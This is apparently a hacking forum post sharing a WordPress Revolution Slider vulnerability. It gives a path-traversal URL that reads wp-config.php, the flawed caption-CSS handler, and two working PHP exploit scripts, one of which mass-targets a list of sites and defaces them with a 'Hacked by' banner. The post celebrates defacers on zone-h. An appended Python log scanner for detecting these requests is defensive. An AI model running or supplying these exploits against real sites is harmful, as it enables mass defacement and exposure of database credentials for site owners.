- Author => KingSkrupellos - Cyberizm Digital Security Team
- Peace be upon you, Cyberizm family. I am going to share the vulnerability that hackers such as Index PHP, YunusIncredibl, Islamic State, Holako and Lunatico have been hammering on zone-h.org for the past few days. Spare no effort for Cyberizm.
- Original thread link => https://www.cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html
- Where the vulnerability originates =>
- [code]/wp-content/plugins/revslider/revslider_admin.php[/code]
- [code]/revslider_admin.php[/code]
- [code]HEDEFSITE/wp-admin/admin-ajax.php[/code]
- [code]HEDEFSITE/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[/code]
- The vulnerability comes directly from the following code.
- [code]// Both values are read straight from the request.
- $action = self::getPostGetVar("client_action");
- $data = self::getPostGetVar("data");
- ...
- case "get_captions_css":
- $contentCSS = $operations->getCaptionsContent();
- self::ajaxResponseData($contentCSS);
- ...
- case "update_captions_css":
- // $data from the request is passed to the update call as-is.
- $arrCaptions = $operations->updateCaptionsContentData($data);
- self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));[/code]
- To see the site you hacked =>
- [code]/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css[/code]
- If you ran the exploit correctly, then when you press Ctrl+A on the link above and it reads
- [code]{"success":true,"message":"","data":"[/code]
- like this, the exploit has worked and your text will appear on the screen.
- Here is the exploit =>
- [hide][code]<?php
- echo "\n+-------------------------------------------+\n";
- echo "| Cyberizm Digital Security Army |\n";
- echo "| http://www.cyberizm.org/ |\n";
- echo "+-------------------------------------------+\n";
- $gv=@file_get_contents($argv[1]);
- $exv=explode("\r\n",$gv);
- echo "\n\t Total site loaded : ".count($exv)."\n\n";
- foreach($exv as $url){
- echo "\n[+]Scaning : $url \n";
- dr($url);
- }
- function dr($site){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
- curl_setopt($ch, CURLOPT_USERAGENT, $agent);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- $result = curl_exec($ch);
- if (eregi('true', $result))
- $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
- $gett=@file_get_contents($path);
- if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
- echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
- $fo = fopen("finish.txt","a+");
- $r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
- fclose($fo);
- } else {
- echo "| ".$site . " : Not Revslider \n\n";
- }
- curl_close($ch);
- }
- echo "\n[-]Exploit Fail \n\n";
- }
- }
- ?>[/code][/hide]
- A shorter form of the exploit
- [hide][code]<?php
- $post = array
- (
- "action" => "revslider_ajax_action",
- "client_action" => "update_captions_css",
- "data" => "<marquee>Malicious Code Here</marquee>"
- );
- $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch);
- curl_close ($ch);
- ?>[/code][/hide]
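From the defender's side, the requests named in this paste leave recognisable traces in a web server access log. The following is an added example, not part of the original paste: a Python scan over constructed combined-format log lines that flags `revslider_show_image` requests whose `img` parameter traverses directories or names a PHP file, and query-string use of the caption CSS actions. The log lines, finding labels and function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "curl/7.38"
203.0.113.7 - - [10/Oct/2015:13:55:40 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 200 3120 "-" "curl/7.38"
198.51.100.9 - - [10/Oct/2015:14:02:11 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2015:14:02:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.15 - - [10/Oct/2015:14:05:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/banner.jpg HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
CAPTION_ACTIONS = {"get_captions_css", "update_captions_css"}

def classify(target):
    """Return a finding label for one request target, or None if nothing matches."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs URL-decodes once; keep the last value of repeated parameters.
    q = {k: v[-1] for k, v in parse_qs(parts.query).items()}
    action = q.get("action", "")
    if action == "revslider_show_image":
        img = unquote(q.get("img", ""))  # second decode catches double encoding
        if ".." in img or img.lower().endswith(".php"):
            return "show_image-file-read"
    if action == "revslider_ajax_action" and q.get("client_action") in CAPTION_ACTIONS:
        return "captions-css-access"
    return None

def scan(log_text):
    """Return (client_ip, status, label) for each flagged request, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        label = classify(target)
        if label:
            findings.append((ip, int(status), label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `update_captions_css` request in the paste is sent as POST fields, so a standard access log shows only a bare POST to `admin-ajax.php`; the follow-up GET for `get_captions_css` from the same client is the trace that does appear.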